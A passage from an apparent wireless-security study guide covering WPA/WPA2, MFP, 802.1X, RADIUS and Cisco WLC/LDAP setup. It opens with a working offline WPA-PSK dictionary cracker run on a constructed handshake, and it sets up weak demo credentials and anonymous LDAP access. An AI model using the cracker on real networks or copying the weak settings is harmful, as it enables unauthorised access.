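    """Key MIC over the EAPOL-Key frame (MIC field zeroed): HMAC-MD5 for TKIP/WPA,
    HMAC-SHA1 truncated to 128 bits for CCMP/WPA2."""
    if ccmp:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


@dataclass
class CapturedHandshake:
    """What a sniffer gets from messages 1 and 2: both MACs, both nonces, and
    message 2's EAPOL-Key frame (MIC zeroed) plus the MIC the client sent."""
    ssid: str
    aa: bytes        # authenticator (AP) MAC address
    spa: bytes       # supplicant (client) MAC address
    anonce: bytes
    snonce: bytes
    eapol2: bytes
    mic2: bytes
    ccmp: bool


def crack_psk(hs: CapturedHandshake, wordlist) -> Optional[str]:
    """For each candidate: PMK -> PTK -> KCK -> recompute the MIC of message 2.
    A match proves the candidate is the passphrase; the AP is never contacted."""
    for word in wordlist:
        kck = derive_ptk(pmk_from_passphrase(word, hs.ssid),
                         hs.aa, hs.spa, hs.anonce, hs.snonce)["kck"]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol2, hs.ccmp), hs.mic2):
            return word
    return None


def build_sample_handshake(passphrase: str, ssid: str, ccmp: bool = True) -> CapturedHandshake:
    """Constructed stand-in for a capture: fixed MACs, nonces from a hash, and a
    placeholder EAPOL-Key message 2 whose MIC the 'client' computes honestly."""
    aa = bytes.fromhex("001122aabbcc")
    spa = bytes.fromhex("00aabb112233")
    anonce = hashlib.sha256(b"anonce").digest()
    snonce = hashlib.sha256(b"snonce").digest()
    eapol2 = bytes.fromhex("0203007502010a00") + bytes(109)   # placeholder frame, MIC zeroed
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)["kck"]
    return CapturedHandshake(ssid, aa, spa, anonce, snonce, eapol2,
                             eapol_mic(kck, eapol2, ccmp), ccmp)


if __name__ == "__main__":
    hs = build_sample_handshake("correct horse", "EcolaCreekWiFi")
    print(crack_psk(hs, ["password", "12345678", "correct horse"]))
```

The cost per candidate is dominated by the 4096 PBKDF2 iterations, which is why the attack is a wordlist attack rather than a brute force, and why the only defence in Personal mode is a passphrase that is not in any wordlist; Enterprise mode removes the attack because the PMK is not derived from anything a person chose.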


WPA2 is the Wi-Fi Alliance's name for the full IEEE 802.11i standard ratified in 2004. It keeps 802.1X authentication and the four-way handshake but replaces the RC4 cipher with AES, the Advanced Encryption Standard selected by the National Institute of Standards and Technology (NIST) from the Rijndael algorithm, in CCMP mode (Counter Mode with CBC-MAC Protocol), which provides encryption and a cryptographic integrity check in one primitive, so the Michael MIC is no longer needed.

Comparison of WPA, WPA2 and 802.11i:

WPA (SOHO): 802.1X authentication or PSK; 128-bit RC4 with TKIP encryption cipher; ad hoc not supported; devices tested for compliance.

WPA2 (Enterprise): 802.1X authentication or PSK; 128-bit AES encryption cipher; ad hoc not supported; devices tested for compliance.

802.11i (Enterprise): 802.1X authentication; 128-bit AES encryption cipher; allows ad hoc; no test, specification only.
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4 \\\, ^\W dilSjjuall ^3 


Key caching

One of the enhancements in WPA/WPA2 networks is key caching: the access point keeps the PMK security association of a station that has already authenticated, so that when the station returns it only completes the 4-way handshake instead of repeating the full authentication exchange, which shortens roaming.



[Figure: PMK caching. The station's Associate request carries its PMK SA list (Bob, Lisa); the Access Point holds PMK SA: Bob and answers Associate response (success), after which the 4-way handshake message (PMK SA: Bob) follows. Preauthentication is shown as a separate step.]


Cisco Centralized Key Management

Cisco Centralized Key Management (CCKM) is Cisco's fast secure roaming method for WPA networks with 802.1X: the association process is managed centrally, the controller acts as the authenticator and caches the PMK, so a client roaming between access points re-associates in under 100 ms without a full re-authentication.


Wireless IDS/IPS 


[Figure: wireless IDS architecture. Access points report to the Controller IDS; events are aggregated at the NCS, which raises "DoS Alert!" or "No Alarm".]



Wireless networks need protection not only through encryption and authentication but also by detecting and stopping attacks on the network itself. Two classes of system do this: Intrusion Detection Systems (IDSs), which detect attacks and report them, and Intrusion Prevention Systems (IPSs), which also act to stop them.


Wireless IDS 

In a Cisco lightweight (LWAPP) deployment the basis is Radio Resource Management (RRM), which gives the controller a picture of the RF environment: it detects interference and measures the traffic load on the network. The same off-channel scanning serves intrusion detection: an access point in Local mode leaves its serving channel for about 30 ms at a time to listen on other channels, and reports to the WCS what it hears there, such as rogue APs and ad hoc networks. Detected rogues are classified in the WCS as Known, External or Internal.


[Figure: Cisco IDS for passive monitoring. WLAN client traffic flows between the LAPs and the WLC over the LWAPP tunnel and from the WLC to the corporate network; a copy of the client traffic is duplicated to the IDS through a monitoring port.]


To move from detection toward prevention (an Intrusion Prevention System, IPS), the first question about a detected rogue AP is whether it is attached to our wired network or is simply a neighbour's access point outside it. Because rogues may appear at branch or remote sites while the controller sits at the central site, two mechanisms answer this question: the Rogue Location Discovery Protocol (RLDP) and the rogue detector access point.

With RLDP an access point associates to the rogue AP as if it were a client and sends a packet through it toward the controller; if the packet reaches the controller, the rogue is connected to our network.

When the rogue cannot be joined over the air, for example because it uses encryption, a rogue detector access point connected to the wired network listens to Address Resolution Protocol (ARP) traffic and matches the MAC addresses seen on the wire against the MAC addresses of rogues heard over the air. Rogue ad hoc networks inside our network are handled by sending disassociation frames to the participating clients.

An IDS, then, is a system for uncovering wireless threats and reporting them; stopping them is the job of another system.


Wireless IPS 


[Figure: Cisco IPS for active, in-line monitoring. WLAN client traffic between the LAPs and the WLC travels over the LWAPP tunnel; the data path from the WLC to the corporate network passes through the IPS.]


A wireless IPS does not stop at raising an alarm: when it detects an attack on the network it acts against the offending device automatically.

An Intrusion Prevention System (IPS) in this sense covers all layers of the network, from the wireless side through to the wired side.

An IPS has three components, the Sensor, the Server and the Console, and they may be separate devices or combined:
- the Sensor monitors the medium and detects attacks, much like a rogue detector;
- the Server collects and analyses the data from all sensors;
- the Console is the interface through which the administrator views what the server has found.

Cisco's product in this area is the Cisco Adaptive Wireless IPS, whose functions are summarised below.


[Table: Cisco Adaptive Wireless IPS. System Functions: Rogue Detection/Mitigation; Over-the-Air Threat Detection; Security Vulnerability Assessment; Performance Monitoring and Self-Healing; Security and Compliance Reporting. Usage Scenarios: Detect/Mitigate Rogue APs and Clients; Detect External Hackers and Thieves; Ensure Strong Network Security Posture; Ensure Consistent WLAN Performance; Internal Security Reporting/Audit; External Compliance Audit Reporting. Further labels in the table: Over-the-Air Detection; Network Detection and Correlation; Complex Attack Analysis, Forensics, Events; Proactive Threat Prevention; Monitoring, Reporting.]

In Cisco's Adaptive Wireless IPS these roles map onto the existing infrastructure: the Mobility Services Engine (MSE) acts as the server, the access points act as sensors through the controller, and WCS is the console.


Management Frame Protection : MFP 



The IEEE 802.11 standard and the Wi-Fi Alliance defined strong protection for data frames, but the management frames of a wireless network (authentication/deauthentication, association/disassociation, beacons, probes) are sent without authentication or encryption, and none of the protections discussed so far (Wi-Fi Protected Access [WPA], WPA2, VPN) cover them. Anyone can forge such frames with freely available tools, the Aircrack suite being the best known, and use them to disconnect clients or impersonate the network. To close this gap Cisco Wireless LAN Controllers (WLCs) introduced Management Frame Protection (MFP), which exists in two forms: Infrastructure MFP and Client MFP.


Infrastructure MFP 


[Figure: Infrastructure MFP. Cisco Aironet Lightweight Access Points validate management frames: a valid management frame from a legitimate AP is accepted, an invalid management frame from a rogue AP is dropped, and an error report is sent via the Cisco Wireless LAN Controller to the Cisco Wireless Control System (WCS).]


Infrastructure MFP works entirely within the infrastructure and needs no support from the client. When it is enabled, the controller generates a unique key for each SSID (BSSID) on each access point radio, and the access point adds a signature, a message integrity check (MIC), to every management frame it transmits. Neighbouring access points validate the MIC on the management frames they hear, so frames that spoof a legitimate BSSID are recognised. An access point that hears an invalid frame reports it to the controller, which passes the report to WCS. The validating access point decides as follows:

- If the BSSID (the transmitter MAC address) is not one the controller knows, the frame comes from a rogue AP and the access point reports it as such.
- If the BSSID is known and MFP is enabled for it but the message integrity check (MIC) is missing or does not verify, the frame has been forged in the name of a legitimate AP and is reported.
- If the BSSID is known, MFP is enabled and the MIC verifies, the frame is accepted as legitimate.

Error reports travel between access point and controller over the AES-encrypted LWAPP management tunnel.
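The three decisions above can be written out as code. The following Python is an added example, not Cisco's implementation: Cisco's MIC algorithm and key distribution are not public, so an HMAC-SHA256 truncated to 8 bytes and keyed per BSSID stands in for the per-BSSID signature, and every BSSID, key and frame in it is a constructed sample value.

```python
"""Model of the Infrastructure MFP decision rules described above.

Added example, not Cisco's code: an HMAC-SHA256 truncated to 8 bytes, keyed
per BSSID, stands in for the per-BSSID signature the controller hands out.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Dict, List, Optional

# Verdicts a validating access point can reach for a management frame it hears.
ROGUE_AP = "rogue-ap"          # BSSID not managed by our controller
FORGED = "forged-dropped"      # known BSSID, MFP on, MIC missing or wrong
UNPROTECTED = "unprotected"    # known BSSID but MFP not enabled for it
VALID = "valid"                # known BSSID, MFP on, MIC verifies


@dataclass(frozen=True)
class MgmtFrame:
    bssid: str             # transmitter address, e.g. "00:11:22:33:44:55"
    subtype: str           # "beacon", "deauth", "disassoc", "probe-resp", ...
    body: bytes            # frame body as heard over the air
    mic: Optional[bytes]   # signature appended by the sender, None if absent


def compute_mic(key: bytes, frame: MgmtFrame) -> bytes:
    """Signature over the fields that identify the frame and its content."""
    msg = b"|".join([frame.bssid.lower().encode(), frame.subtype.encode(), frame.body])
    return hmac.new(key, msg, hashlib.sha256).digest()[:8]


def sign(key: bytes, bssid: str, subtype: str, body: bytes) -> MgmtFrame:
    """What an MFP-enabled access point does when it transmits a frame."""
    unsigned = MgmtFrame(bssid, subtype, body, None)
    return MgmtFrame(bssid, subtype, body, compute_mic(key, unsigned))


def classify(frame: MgmtFrame, managed: Dict[str, Optional[bytes]]) -> str:
    """Decision a neighbouring access point makes for one heard frame.

    `managed` maps every BSSID the controller owns to its MFP key, or to
    None when MFP is not enabled for that BSSID.
    """
    bssid = frame.bssid.lower()
    if bssid not in managed:
        return ROGUE_AP
    key = managed[bssid]
    if key is None:
        return UNPROTECTED
    expected = compute_mic(key, MgmtFrame(bssid, frame.subtype, frame.body, None))
    # compare_digest avoids leaking the MIC through timing differences
    if frame.mic is None or not hmac.compare_digest(expected, frame.mic):
        return FORGED
    return VALID


def demo() -> List[str]:
    """Runs the cases over constructed (not captured) sample frames."""
    corp_key = b"constructed-per-bssid-key-0001"   # stand-in for a controller key
    managed = {
        "00:1a:a1:00:00:01": corp_key,   # corporate BSSID, MFP enabled
        "00:1a:a1:00:00:02": None,       # corporate BSSID, MFP disabled
    }
    genuine = sign(corp_key, "00:1a:a1:00:00:01", "beacon", b"SSID=corp")
    # a frame reusing the corporate BSSID without the key carries no valid MIC
    spoofed = MgmtFrame("00:1a:a1:00:00:01", "deauth", b"reason=7", None)
    # a genuine MIC copied onto a changed body no longer verifies
    tampered = MgmtFrame(genuine.bssid, genuine.subtype, b"SSID=evil", genuine.mic)
    neighbour = MgmtFrame("0c:dd:00:00:00:09", "beacon", b"SSID=cafe", None)
    unprotected = MgmtFrame("00:1a:a1:00:00:02", "beacon", b"SSID=guest", None)
    return [classify(f, managed) for f in (genuine, spoofed, tampered, neighbour, unprotected)]
```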


Client MFP 


[Figure: Client MFP. A rogue AP impersonating the access point of the Cisco Wireless LAN Controller sends forged management frames to a client.]

The attack that Client MFP addresses is AP impersonation (spoofing the AP's MAC): an attacker sends frames such as deauthentication and disassociation to clients in the name of the legitimate access point, and the clients drop their connections; repeated, this is a denial-of-service (DoS) attack on the WLAN.

Client MFP protects the connection between an authenticated client and its access point by adding a MIC to the unicast management frames exchanged between them (deauthentication, disassociation and Probe Response), so spoofed frames that lack a valid MIC are discarded by the client and the DoS attempt fails.

This protection requires clients that support Cisco Compatible Extensions v5 and WPA2 with either Temporal Key Integrity Protocol (TKIP) or AES-Counter CBC-MAC (AES-CCMP).


Centralizing WLAN Authentication 802 . IX 



The weakness in everything covered so far is the key itself: one key shared by all users of the network, so that whenever it must be changed it has to be changed on every device. What is wanted instead is authentication of each user individually, with encryption keys specific to that user, and central control over who may join the network. This is what 802.1X provides. An 802.1X system has three components: the Supplicant, the Authenticator and the Authentication server.


[Figure: 802.1X components. Supplicant, Authenticator and Authentication server; the Authenticator talks to the Authentication server over RADIUS / Diameter.]


The Supplicant is the device that wants to join the network, i.e. the client.

The Authenticator is the device that controls access to the network: a switch in a wired LAN or an access point in a WLAN.

The Authentication server is the server that verifies the identity of every device requesting access, typically a RADIUS server.

[Figure: Authenticator System 1 and Authenticator System 2 in front of the Authentication server.]

In this model the Supplicant and the Authenticator exchange messages, and the Authenticator relays the credentials to the Authentication server, which makes the decision. This is called "port"-based authentication because the Authenticator opens the port (the switch port, or the association in wireless) only after the server has accepted the user.


802.1X over Wireless


In wireless networks the authenticator is the access point. The exchange begins as in any WLAN: the supplicant sends an authentication request and receives an authentication response (open authentication), then sends an association request and receives an association response.


After this association the client still cannot send data into the network: the authenticator keeps the port blocked, only 802.1X traffic is allowed through, and that traffic is forwarded to the RADIUS server. Only when the RADIUS server confirms that the device presenting the credentials is allowed on the network does the authenticator open the port for data.

In wired networks the arrangement is the same: the Supplicant and the Authenticator exchange 802.1X frames, the Authenticator relays the credentials to the Authentication server over RADIUS, and the switch port is opened only on success.


[Figure: Unique encryption keys. Each client (Blue, Gold, Red, Green) holds a key of its own, and the access point holds the matching set.]


With 802.1X every supplicant therefore receives its own key instead of the one static key shared across the network, and that key is generated for each session: at each login the RADIUS server and the client derive a per-user WEP key (dynamic WEP), and the key changes when the client re-authenticates. These per-user, per-session keys are known as session keys.


Extensible Authentication Protocol -EAP 


[Figure: EAP exchange between station, access point and RADIUS server: Association Request -> Association Response -> EAPOL-Start -> EAPOL-Request/Identity -> EAP-Response/Identity -> EAP-Response/Identity over RADIUS -> EAP-Request over RADIUS -> EAP-Request -> EAP-Response -> EAP-Request over RADIUS -> EAP-Success over RADIUS -> EAP-Success & Encryption Key -> Key Management.]



The Extensible Authentication Protocol (EAP) was defined by the Internet Engineering Task Force (IETF) to solve the authentication problem of dial-in ISPs: instead of the fixed Challenge Handshake Authentication Protocol (CHAP) or Password Authentication Protocol (PAP), it negotiates an "authentication type", so a new method can be added without changing the protocol that carries it.

EAP has four message types: request, response, success and failure, and it exists in several flavours, among them LEAP (Lightweight EAP), PEAP (Protected EAP), EAP-FAST (EAP-Flexible Authentication via Secure Tunneling) and EAP-TLS (EAP-Transport Layer Security).

These methods are covered in detail in both the CWNP and the Cisco wireless curricula.


RADIUS: the authentication server for wireless networks

[Figure: the Authentication Server / RADIUS Server evaluates policy conditions such as "If Group = x", "If time between 9 am and 5 pm", "If temperature below 90 F", "If VLAN = 80" before it grants access.]

RADIUS is a client/server protocol that works at the application layer. Remote Authentication Dial In User Service (RADIUS) can check credentials against its own database or against a directory such as Active Directory, and it provides the three AAA functions: authentication, authorization and accounting. It was developed in 1991 by Livingston Enterprises, was later standardised by the Internet Engineering Task Force (IETF), and is widely used in ISP networks and in wireless networks.

Cisco's RADIUS server product is the Cisco Secure Access Control Server (ACS).

The exchange takes place between the RADIUS client, called the network access server (NAS), and the RADIUS server, and it is carried over the User Datagram Protocol (UDP).

In a wireless network the Wireless LAN Controller (WLC) is the NAS and the Cisco Secure Access Control Server (Cisco Secure ACS) provides AAA for the WLAN; this is the arrangement configured in the following pages.


[Figure: RADIUS roles. The Supplicant (Dial in User) connects through the Authenticator / RADIUS Client, which reaches the RADIUS server across the Internet.]



Cisco Secure ACS Configuration 

After installing ACS on Windows Server 2003 we create two administrator accounts, one read-write and one read-only:


Username — acsreadwrite 
Password — acsreadwrite 
Username — acsreadonly 
Password — acsreadonly 


Next the controller must be added as an AAA Client on the RADIUS server: go to Network Configuration > Add Entry and fill in the controller's details as in the following screenshot.



[Screenshot: Network Configuration > Add AAA Client, where the controller's hostname, IP address, shared key and authentication method are entered.]


The two administrator accounts receive read-write and read-only permissions respectively. After that we add the wireless users:


[Screenshot: User Setup. Account Disable: Never / Disable account if date exceeds or failed attempts exceed (failed attempts since last successful login: 0; reset current failed attempts count on submit). IETF RADIUS Attributes: [006] Service-Type set to Authenticate only; the other values offered are Callback NAS Prompt, Administrative, Callback Administrative, Callback login, Framed, Login and Callback framed.]


WLC Configuration 

Security > AAA > RADIUS > Authentication


[Screenshot: RADIUS Authentication Servers > New, with the fields Server Index (Priority), Server IP Address, Shared Secret Format, Shared Secret, Confirm Shared Secret, Key Wrap (designed for FIPS customers and requires a key wrap compliant RADIUS server), Port Number, Server Status, Support for RFC 3576, Server Timeout and Network User; the priority drop-down offers indexes 1 to 17.]
Server Index (Priority): the controller supports up to 17 RADIUS servers; this index sets the order in which they are tried.
Server IP Address: the address of the RADIUS server.
Shared Secret Format: whether the shared secret is entered in ASCII or hexadecimal.
Shared Secret/Confirm Shared Secret: the secret agreed with the RADIUS server; it must match what was entered on the ACS for this AAA client.
Key Wrap: protects the key material with AES (Advanced Encryption Standard) key wrap; intended for FIPS customers and requires a key wrap compliant RADIUS server.
Port Number: the UDP port on which the server listens.
Server Status: enables or disables use of this server.
Support for RFC 3576: enables the server-initiated messages defined in that RFC (dynamic authorization changes and disconnects).
Server Timeout: how long the controller waits for a reply, from 2 to 30 seconds.
Network User: enables this server for authenticating network (wireless) users.

After filling in the fields and clicking Apply, the server appears in the list under Security > AAA > RADIUS > Authentication.
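The Shared Secret configured above is what protects the User-Password attribute on its way from the WLC (the NAS) to the ACS. The following Python is an added example, not Cisco's or any RADIUS server's code: it implements the RFC 2865 section 5.2 password hiding and unhiding and builds a minimal Access-Request; the secret, Request Authenticator, NAS address and user name are constructed values.

```python
"""RADIUS User-Password protection between NAS and server (RFC 2865 5.2)
and the Access-Request packet that carries it.

Added example, not Cisco's code. It shows what the shared secret protects:
the password is XORed with MD5(secret || Request Authenticator) blocks, so a
weak or exposed shared secret exposes every password crossing the UDP path.
"""
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_NAS_IP_ADDRESS = 4


def hide_password(secret: bytes, authenticator: bytes, password: bytes) -> bytes:
    """NAS side: pad with NULs to 16-byte blocks, c_i = p_i XOR MD5(S || c_{i-1}),
    with c_0 = the 16-byte Request Authenticator."""
    if len(password) > 128:
        raise ValueError("User-Password is limited to 128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    if not padded:                     # an empty password still fills one block
        padded = b"\x00" * 16
    out = b""
    prev = authenticator
    for i in range(0, len(padded), 16):
        b = hashlib.md5(secret + prev).digest()
        c = bytes(x ^ y for x, y in zip(padded[i:i + 16], b))
        out += c
        prev = c
    return out


def reveal_password(secret: bytes, authenticator: bytes, hidden: bytes) -> bytes:
    """Server side: recompute the same MD5 chain, XOR back, strip the padding.
    (Trailing NUL bytes in a real password are indistinguishable from padding.)"""
    if len(hidden) % 16:
        raise ValueError("hidden password must be a multiple of 16 octets")
    out = b""
    prev = authenticator
    for i in range(0, len(hidden), 16):
        b = hashlib.md5(secret + prev).digest()
        c = hidden[i:i + 16]
        out += bytes(x ^ y for x, y in zip(c, b))
        prev = c
    return out.rstrip(b"\x00")


def attribute(code: int, value: bytes) -> bytes:
    """Type-Length-Value encoding; Length covers the two header octets too."""
    return struct.pack("!BB", code, len(value) + 2) + value


def access_request(secret: bytes, username: str, password: str, nas_ip: str,
                   identifier: int = 1, authenticator: bytes = None):
    """Build the Access-Request the NAS sends; returns (packet, authenticator).
    A random Request Authenticator is drawn unless one is supplied (tests)."""
    ra = authenticator if authenticator is not None else os.urandom(16)
    attrs = (attribute(ATTR_USER_NAME, username.encode())
             + attribute(ATTR_USER_PASSWORD, hide_password(secret, ra, password.encode()))
             + attribute(ATTR_NAS_IP_ADDRESS, bytes(int(o) for o in nas_ip.split("."))))
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs))
    return header + ra + attrs, ra
```

With 802.1X/EAP the credentials travel inside EAP-Message attributes instead of User-Password, and the packet is integrity-protected by a Message-Authenticator attribute; that protection is keyed with the same shared secret, so its strength matters just as much there.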



Next we bind the WLAN to this server: open WLANs > Edit for the WLAN, go to Security > AAA Servers and select the RADIUS server from the Authentication Servers drop-down.

[Screenshot: WLANs > Edit > Security > AAA Servers: "Select AAA servers below to override use of default servers on this WLAN"; Radius Servers, Authentication Servers Enabled, Server 1 = IP:10.10.1.254, Port:1812, Accounting Servers None; Local EAP Authentication.]


Web Authentication against Windows 2003 Active Directory over LDAP

[Figure: the web authentication client reaches the controller through a Layer 2 switch.]

This section shows how to configure the controller for web authentication with user accounts held in a Lightweight Directory Access Protocol (LDAP) directory, here Microsoft Windows 2003 server with Active Directory. Web authentication is a Layer 3 security method: the controller blocks the client's IP traffic until the user enters a valid username and password on the login page, so no special client software is required.

It is assumed that the reader is familiar with Lightweight Access Points (LAPs), Cisco WLCs and the Lightweight Access Point Protocol (LWAPP), and with Windows Active Directory and domain controllers.


Components used

The following components were used in this lab:


• Cisco 4400 WLC that runs firmware release 5.1 

• Cisco 1232 Series LAP 

• Cisco 802.11a/b/g Wireless Client Adapter that runs firmware release 4.2


• Microsoft Windows 2003 server that performs the role of the LDAP 
server 


Configure LDAP Server 


Lightweight Directory Access Protocol (LDAP) is the protocol used to query the user database; on Microsoft Windows 2003 server that database is Active Directory.

First create an Organizational Unit (OU) for the wireless users, here named wireless-users, and create the user accounts inside it.

The controller binds to the directory anonymously, so anonymous LDAP queries must be permitted on the server. Open the ADSI Edit tool on the Windows 2003 server (Start > Run > type: ADSI Edit.msc), expand CN=Services > CN=Windows NT > CN=Directory Service, open its properties and in the Attributes tab set dsHeuristics to 0000002.

The attribute editor then shows the value as in the following screenshot.




[Screenshot: ADSI Edit, CN=Directory Service Properties > Attribute Editor with "Show mandatory attributes" and "Show optional attributes" ticked; the attribute dsHeuristics (Unicode String) is set to 0000002.]



Next the anonymous account needs read access to the user objects. In Active Directory Users and Computers enable View > Advanced Features, open the properties of the wireless user, go to the Security tab, click Add and add ANONYMOUS LOGON, then grant it the Read permission.

































































[Screenshot: "Select Users, Computers, or Groups" (object type: Users, Groups, or Built-in security principals; location: lab.wireless), then "User1 Properties" > Security, where ANONYMOUS LOGON is listed alongside Account Operators, Administrators, Authenticated Users and Cert Publishers and is allowed Read; Full Control, Write, Create All Child Objects, Delete All Child Objects and Allowed to Authenticate are left unchecked.]


Use LDP to Identify the User Attributes 


The WLC needs three values from the directory: the user base DN, the user attribute and the user object type. The LDP tool lets us browse the LDAP server, confirm that a connection to it works, and read these values directly from the user entry.



[Screenshot: LDP, Connection > Connect to 10.8.22.44 on port 389. Output: ld = ldap_open("10.8.22.44", 389); Established connection to 10.8.22.44. Retrieving base DSA information... defaultNamingContext: DC=WIRELESS,DC=LOCAL; dnsHostName: 1142-ISFC-V01.WIRELESS.LOCAL; supportedLDAPVersion: 3; 2; supportedSASLMechanisms: GSSAPI; GSS-SPNEGO; EXTERNAL; DIGEST-MD5; domainFunctionality: 0 = ( DS_BEHAVIOR_WIN2000 ).]


Next choose View > Tree and enter the BaseDN OU=wireless-users, DC=WIRELESS, DC=LOCAL; the tree lists the users in the OU, user1 and user2.


[Screenshot: LDP tree view for ldap://1142-ISFC-V01.WIRELESS.LOCAL/DC=WIRELESS,DC=LOCAL showing OU=wireless-users, DC=WIRELESS, DC=LOCAL with children CN=user1 and CN=user2. The rootDSE output is repeated; one attempt to expand the base returned Result <32>: 0000208D: NameErr: DSID-03151EFD, problem 2001 (NO_OBJECT), Matched DNs: DC=WIRELESS,DC=LOCAL.]


Double-click the user1 entry to list its attributes:

Expanding base 'CN=user1,OU=wireless-users,DC=WIRELESS,DC=LOCAL'...
Result <0>: (null)
Matched DNs:
Getting 1 entries:
>> Dn: CN=user1,OU=wireless-users,DC=WIRELESS,DC=LOCAL
4> objectClass: top; person; organizationalPerson; user;
1> cn: user1;
1> givenName: user1;
1> distinguishedName: CN=user1,OU=wireless-users,DC=WIRELESS,DC=LOCAL;
1> instanceType: 0x4 = ( IT_WRITE );
1> whenCreated: 3/18/2013 10:40:38 Arab Standard Time Arab Standard Time;
1> whenChanged: 3/18/2013 11:7:40 Arab Standard Time Arab Standard Time;
1> displayName: user1;
1> uSNCreated: 12419;
1> uSNChanged: 12446;
1> name: user1;
1> objectGUID: 6ab23e2f-9c68-4f85-9264-e6b8e49ba354;
1> userAccountControl: 0x10200 = ( UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD );
1> badPwdCount: 0;
1> codePage: 0;
1> countryCode: 0;
1> badPasswordTime: 0;
1> lastLogoff: 0;
1> lastLogon: 0;
1> pwdLastSet: <ldp error <0x0>: cannot format time field;
1> primaryGroupID: 513;
1> objectSid: S-1-5-21-2893340686-282350782-2825461547-1105;
1> accountExpires: <ldp error <0x0>: cannot format time field;
1> logonCount: 0;
1> sAMAccountName: user1;
1> sAMAccountType: 805306368;
1> userPrincipalName: user1@WIRELESS.LOCAL;
1> objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=WIRELESS,DC=LOCAL;


From this entry we take the values the WLC's LDAP configuration needs: the User Base DN is OU=wireless-users, DC=WIRELESS, DC=LOCAL, the User Attribute is sAMAccountName, and the User Object Type is Person.

Configure WLC for LDAP Server 

Now we point the controller at the Windows 2003 AD database: on the WLC go to Security > AAA > LDAP.


[Screenshot: WLC Security > AAA > LDAP > LDAP Servers, listing Server Index 1, Server Address 10.8.22.44, Port 389, Server State Enabled, Bind Anonymous.]


Click New and fill in the values found with LDP:


[Screenshot: LDAP Servers > New: Server Index (Priority) 1; Server IP Address 10.8.22.44; Port Number 389; Simple Bind Anonymous; User Base DN OU=wireless-users, DC=WIRELESS, DC=LOCAL; User Attribute sAMAccountName; User Object Type Person; Server Timeout 2 seconds; Enable Server Status Enabled.]

Click Apply, then go to the WLANs page.


[Screenshot: WLANs list (WLAN ID 1, profile MOE-students, SSID MOE-students, Enabled, Web-Auth; WLAN ID 2, profile moe-manage, SSID manager, Enabled, WEP, Web-Auth), then WLANs > Edit > General for the profile "web" (Type Guest LAN, SSID web, Status Enabled, Security Policies Web-Auth, Ingress Interface None, Egress Interface student-interfaces).]


Then open the Security tab, choose Layer 3 and select Web Policy with Authentication, as in the following screenshot:


[Screenshot: WLANs > Edit > Security > Layer 3: Layer 3 Security None; Web Policy enabled with Authentication selected (Passthrough, Conditional Web Redirect and Splash Page Web Redirect unselected); Preauthentication ACL None; Over-ride Global Config enabled; Web Auth type Internal.]


Next open the AAA Servers tab and make the LDAP server the authentication source for this WLAN, as in the following screenshot:


[Screenshot: WLANs > Edit > Security > AAA Servers: Radius Servers Authentication and Accounting not enabled (Server 1 to 3 None); Local EAP Authentication not enabled; LDAP Servers Server 1 = IP:10.8.22.44, Port:389, Server 2 and Server 3 None; Authentication priority order for web-auth user: LDAP is the order used for authentication, RADIUS and LOCAL are not used.]


Now connect a client to the WLAN and browse to http://1.1.1.1/login.html. The address 1.1.1.1 is the controller's Virtual Interface Address, on which the controller presents the web authentication login page; the user logs in with the username and password of the Active Directory (AD 2003) account.


[Screenshot: the controller's web authentication login page with User Name and Password fields.]


With this, Web Authentication against the Windows 2003 LDAP server is complete.


Local EAP

What happens if the RADIUS server fails? Every user of the wireless network would be unable to authenticate and the controller would have no way to let them in. Local EAP is the answer: the controller itself acts as the authentication server, verifying users against its local database or an LDAP server, and it can be configured as a fallback for when the RADIUS server is unreachable, so service continues until the RADIUS server returns. The controller supports several EAP methods locally, among them LEAP, EAP-FAST, EAP-TLS and PEAP, with PEAP MS-CHAPv2 (Microsoft Challenge Handshake Authentication Protocol version 2) and PEAP GTC, and it switches to Local EAP when the RADIUS server does not answer within the configured timeout.

Configuring Local EAP

Go to Security > Local EAP > Profiles and create a new profile:


63


[Screenshot: Security > Local EAP > Profiles. Local EAP Profiles list (columns Profile Name, EAP-TLS, PEAP) with the New... and Apply buttons. Left menu: AAA; Local EAP (General, Profiles, EAP-FAST Parameters, Authentication Priority); Priority Order; Certificate; Access Control Lists; Wireless Protection Policies; Web Auth; Advanced.]


[Screenshot: Local EAP Profiles > New. Profile Name: users. Buttons: < Back, Apply.]

Enter the profile name and click Apply; the profile then appears in the list, where you choose the EAP methods to enable (LEAP, EAP-FAST, EAP-TLS, PEAP).


[Screenshot: Security > Local EAP > Profiles after creating the profile. Profile Name: users, with checkboxes for LEAP, EAP-FAST, EAP-TLS and PEAP.]


We named the profile Users. Click the profile name to select the EAP methods you want to use; these methods are covered in full in the CCNP Wireless material.


64
[Screenshot: Local EAP Profiles > Edit for profile users. LEAP, EAP-FAST, EAP-TLS and PEAP: all enabled. Local Certificate Required: Enabled. Client Certificate Required: Enabled. Certificate Issuer: Cisco. Check against CA certificates: Enabled. Verify Certificate CN Identity: Enabled. Check Certificate Date Validity: Enabled. Buttons: < Back, Apply.]



Next, open the Security > Local EAP > EAP-FAST Parameters page to set the EAP-FAST parameters.


[Screenshot: Security > Local EAP > EAP-FAST Parameters. EAP-FAST Method Parameters: Server Key (in hex): ****; Confirm Server Key: ****; Time to live for the PAC: 10 days; Authority ID (in hex): 436973636f; Authority ID Information: Cisco A-ID; Anonymous Provision: Enabled. Apply.]


Server Key (in hexadecimal): the key used for encryption and decryption (of the PAC). It must be entered in hexadecimal, that is the digits 0-9 and the letters A-F.

Time to Live for the PAC: the lifetime of the PAC in days; the value can be from 1 to 1000.

Authority ID (in hexadecimal): the identifier of the EAP-FAST server, entered in hexadecimal, 32 characters at most.

Authority ID Information: a textual description of the authority ID.
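The following Python snippet is an added illustration, not code from the book or from Cisco: it checks candidate values for these four fields against the limits just described before they are typed into the page, and it decodes the Authority ID from the screenshot (436973636f), which is simply the text "Cisco" written in hexadecimal. The limits come from the description above; the requirement that the authority ID has an even number of hex characters (whole bytes) and the 16-byte length of the generated server key are my assumptions and should be confirmed on the controller.

```python
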